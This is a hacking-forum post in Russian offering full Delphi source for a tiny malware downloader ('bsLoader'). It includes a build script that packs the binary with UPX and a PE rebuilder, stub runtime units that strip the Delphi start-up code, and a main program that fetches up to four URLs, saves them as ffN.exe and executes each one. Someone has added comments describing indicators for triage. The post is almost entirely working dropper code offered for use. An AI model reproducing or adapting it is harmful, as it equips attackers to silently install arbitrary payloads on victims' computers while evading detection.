blаcksun
Кто-то тут просил лоадер… Вес билда: 3 кб. build.bat quote:
rem Build script for the loader as posted; the forum quote had collapsed it onto one line.
rem Reviewer notes describe what each step does to the resulting file (defensive reading).
@echo off
rem Remove the output of any previous build.
del loader.exe
rem Compile the two stub units listed below (System.pas, SysInit.pas) with the author's flags.
rem NOTE(review): presumably these replace the stock Delphi runtime units so that almost no
rem runtime code is linked - confirm against a built sample.
dcc32 -Q System.pas SysInit.pas -M -Y -Z -$D-
rem Compile the loader program itself.
dcc32 -Q loader.dpr -$O+
pause
rem Post-process the executable with dd.exe (described by the author as a "PE Rebuilder").
start /wait dd.exe loader.exe
rem Pack the executable with UPX.
rem Triage note: the distributed file is therefore packed and has rebuilt PE headers; the
rem strings and imports visible in loader.dpr are only expected to show up after unpacking
rem - TODO confirm on a sample.
start /wait upx.exe loader.exe
cls
dd.exe - PE Rebuilder
———– SysInit.pas quote:
// Stub version of the Delphi runtime unit SysInit, posted together with the loader.
// Every routine in this unit has an empty asm body, so none of them performs any
// start-up or shutdown work.
// NOTE(review): build.bat compiles this unit (with System.pas) before loader.dpr;
// presumably the stubs are linked instead of the stock runtime to reach the small
// build size the post mentions - confirm against a built sample.
// Triage note: a binary built this way would not be expected to contain the usual
// Delphi start-up code, so tooling that recognises Delphi programs by that code may
// not identify it as one - TODO confirm.
unit SysInit;
interface
// Entry points declared here; all three are implemented below as empty bodies.
procedure _InitExe;
procedure _halt0;
procedure _InitLib(Context: PInitContext);
// Variables declared but never read or written anywhere in this unit.
// presumably present only because the compiler expects these names - TODO confirm
var
ModuleIsLib: Boolean;
TlsIndex: Integer = -1;
TlsLast: Byte;
const
PtrToNil: Pointer = nil;
implementation
// Empty body: the Context argument is ignored.
procedure _InitLib(Context: PInitContext);
asm
end;
// Empty body: no executable initialisation is performed.
procedure _InitExe;
asm
end;
// Empty body: no shutdown handling is performed here.
procedure _halt0;
asm
end;
end.
———- system.pas quote:
// Stub version of the Delphi runtime unit System, posted together with the loader.
// It declares two record types and one routine with an empty body; nothing else of
// the runtime (memory manager, string support, exception handling) appears here.
// NOTE(review): presumably compiled in place of the stock System unit to keep the
// binary very small - confirm against a built sample.
unit System;
interface
// Implemented below as an empty asm body.
procedure _HandleFinally;
type
// 16-byte GUID layout: one LongWord, two Words and eight bytes.
TGUID = record
D1: LongWord;
D2: Word;
D3: Word;
D4: array [0..7] of Byte;
end;
// Pointer to the context record below; SysInit._InitLib takes a value of this type.
PInitContext = ^TInitContext;
// Context record; no code in the posted listings reads or writes its fields.
// presumably declared only because the compiler expects the type - TODO confirm
TInitContext = record
OuterContext: PInitContext;
ExcFrame: Pointer;
InitTable: pointer;
InitCount: Integer;
Module: pointer;
DLLSaveEBP: Pointer;
DLLSaveEBX: Pointer;
DLLSaveESI: Pointer;
DLLSaveEDI: Pointer;
ExitProcessTLS: procedure;
DLLInitState: Byte;
end;
implementation
// Empty body: no finally-block handling is performed.
procedure _HandleFinally;
asm
end;
end.
———- loader.dpr quote:
{
###### bsLoader ######
by BlackSun
http://stars-team.org.ru
http://xaknet.ru
Compile only with the batch file! (build.bat)
}
// Review summary (defensive reading): this program is a downloader. The declarations
// below bind it directly to Windows API exports instead of using the Delphi units:
//   wininet.dll  - InternetOpenA, InternetOpenUrlA, InternetReadFile, InternetCloseHandle
//   Shell32.dll  - ShellExecuteA
//   Kernel32.dll - CreateFileA, WriteFile, CloseHandle, ExitProcess, Sleep
// Triage note: these are static imports, so this combination (HTTP fetch + file write +
// shell launch) is what the import table of an unpacked sample should show; build.bat
// packs the file with UPX, so the on-disk import table is expected to differ - TODO confirm.
program loader;
const
// DLL names used by the external declarations below.
Kernel32 = 'Kernel32.dll';
Winetdll = 'wininet.dll';
// WinINet: opens an internet session; lpszAgent is the agent string for the session.
function InternetOpen(lpszAgent: PChar; dwAccessType: LongWord;
lpszProxy, lpszProxyBypass: PChar; dwFlags: LongWord): Pointer; stdcall;
external Winetdll name 'InternetOpenA';
// WinINet: opens the resource at lpszUrl within an existing session.
function InternetOpenUrl(hInet: Pointer; lpszUrl: PChar;
lpszHeaders: PChar; dwHeadersLength: LongWord; dwFlags: LongWord;
dwContext: LongWord): Pointer; stdcall; external Winetdll name 'InternetOpenUrlA';
// WinINet: reads response data into lpBuffer and reports the byte count.
function InternetReadFile(hFile: Pointer; lpBuffer: Pointer;
dwNumberOfBytesToRead: LongWord; var lpdwNumberOfBytesRead: LongWord): Boolean; stdcall;
external Winetdll name 'InternetReadFile';
// WinINet: closes a session or URL handle.
function InternetCloseHandle(hInet: Pointer): Boolean; stdcall;
external Winetdll name 'InternetCloseHandle';
// Shell32: launches FileName through the shell; used by the program to run what it downloaded.
function ShellExecute(hWnd: Integer; Operation, FileName, Parameters,
Directory: PChar; ShowCmd: Integer): Integer; stdcall; external 'Shell32.dll'
name 'ShellExecuteA';
// Kernel32: creates or opens a file and returns its handle.
function CreateFileA(lpFileName: PChar; dwDesiredAccess, dwShareMode: LongWord;
lpSecurityAttributes: PChar; dwCreationDisposition,
dwFlagsAndAttributes: LongWord; hTemplateFile: Integer): Integer; stdcall;
external Kernel32 name 'CreateFileA';
// Kernel32: writes a buffer to a file handle.
function WriteFile(hFile: Integer; const Buffer;
nNumberOfBytesToWrite: LongWord; var lpNumberOfBytesWritten: LongWord;
lpOverlapped: PChar): Boolean; stdcall;
external Kernel32 name 'WriteFile';
// Kernel32: closes a file handle.
function CloseHandle(hObject: Integer): Boolean; stdcall;
external Kernel32 name 'CloseHandle';
// Kernel32: terminates the process; called explicitly at the end of the main block.
procedure ExitProcess(uExitCode: Integer); stdcall;
external Kernel32 name 'ExitProcess';
// Disabled import, left commented out by the author.
// function lstrcatA(lpString1, lpString2: PChar): Pchar; stdcall;
// external Kernel32 name 'lstrcatA';
// Kernel32: suspends the calling thread for the given number of milliseconds.
procedure Sleep(milliseconds: Cardinal); stdcall;
external Kernel32 name 'Sleep'; stdcall;
// ##### Debug ######
// Disabled debug import (MessageBoxA), left commented out by the author.
{ function MessageBoxA(hWnd: Integer; lpText, lpCaption: PChar; uType: Integer): Integer;
stdcall; external 'user32.dll' name 'MessageBoxA'; }
// Four download-source constants. Each is the text 'http://' followed by a run of 'a'
// characters, i.e. fixed-length filler rather than a real address.
// NOTE(review): presumably the real addresses are written over this filler in the compiled
// file by a separate step that the post does not show - confirm. For analysis this means
// the addresses used by a given sample have to be read from the unpacked binary, not from
// this listing. The scheme in the filler is plain http, so the requests would be visible
// to network inspection unless the replacement values change the scheme.
const
File1 = 'http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa';
File2 = 'http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa';
File3 = 'http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa';
File4 = 'http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa';
// Fetches up to four files over WinINet and launches each one after writing it to disk.
//
// Observable behaviour, as far as this listing shows (useful for detection and triage):
//   - one WinINet session is opened with the agent string 'a';
//   - each file is saved under a fixed bare name: ff1.exe, ff2.exe, ff3.exe, ff4.exe
//     (no directory is given, so the location depends on the process's current directory);
//   - each saved file is started with ShellExecute straight after it is closed, so the
//     pattern is "file created, then run by the same parent process";
//   - the program waits 24000 ms after every launch before handling the next file.
// No API return value is checked anywhere in this procedure, and nothing is verified about
// the downloaded content before it is executed.
procedure DownloadAllFiles;
var
// Session and URL handles; shared with the nested DownloadFile procedure.
hSession, hURL: Pointer;
// Downloads URL into the file Name, runs that file, then sleeps.
procedure DownloadFile(URL, Name: PChar);
const
BufferSize = 1024;
var
hFile: Integer;
Buffer: array[1..BufferSize] of Byte;
BufferLen: LongWord;
begin
// Open the URL in the session created by the outer procedure; the result is not checked.
hURL := InternetOpenURL(hSession, URL, nil, 0, 0, 0);
// $40000000 = GENERIC_WRITE, share mode 0 (no sharing), 2 = CREATE_ALWAYS (an existing
// file of the same name is overwritten), $00000080 = FILE_ATTRIBUTE_NORMAL.
hFile := CreateFileA(Name, $40000000, 0, nil, 2, $00000080, 0);
// Copy the response to the file in chunks of at most 1024 bytes. BufferLen is used both
// as the "bytes read" output and as the "bytes written" output of WriteFile; the loop
// stops once it is 0.
repeat
InternetReadFile(hURL, @Buffer, SizeOf(Buffer), BufferLen);
WriteFile(hFile, Buffer, BufferLen, BufferLen, nil);
until
BufferLen = 0;
CloseHandle(hFile);
InternetCloseHandle(hURL);
// Launch the saved file: no verb and no parameters are passed; ShowCmd 1 = SW_SHOWNORMAL.
ShellExecute(0, nil, Name, nil, nil, 1);
// Fixed 24-second pause after each launch.
Sleep(24000);
end;
begin
// Agent string 'a'; access type 0 = INTERNET_OPEN_TYPE_PRECONFIG (system proxy settings).
// Triage note: WinINet sends the agent string as the User-Agent header, so a one-character
// value like this is a candidate network indicator - confirm against captured traffic.
hSession := InternetOpen('a', 0, nil, nil, 0);
// Each constant is compared with the empty string before use; with the values in this
// listing all four comparisons are true.
if File1 <> '' then
DownloadFile(File1, 'ff1.exe');
if File2 <> '' then
DownloadFile(File2, 'ff2.exe');
if File3 <> '' then
DownloadFile(File3, 'ff3.exe');
if File4 <> '' then
DownloadFile(File4, 'ff4.exe');
InternetCloseHandle(hSession);
end;
// Program entry: an inline-assembly block, then the download routine, then process exit.
begin
// The asm block jumps over eight data bytes that spell 'bsLoader'; the bytes are never
// executed. NOTE(review): their purpose is not stated in the post - presumably an author
// marker. Triage note: in an unpacked image this is a short jump followed by the ASCII
// text 'bsLoader' at the start of the program's code, which makes a simple static
// indicator; build.bat packs the file with UPX, so it is not expected in the packed file
// as-is - TODO confirm.
asm
jmp @Start
db 'b'
db 's'
db 'L'
db 'o'
db 'a'
db 'd'
db 'e'
db 'r'
@Start:
end;
// Run the download-and-launch sequence, then terminate explicitly with exit code 0.
DownloadAllFiles;
ExitProcess(0);
end.
—————- [C] BlackSun [S.T.A.R.S. Team][XakNet Team] http://stars-team.org.ru http://forum.xaknet.ru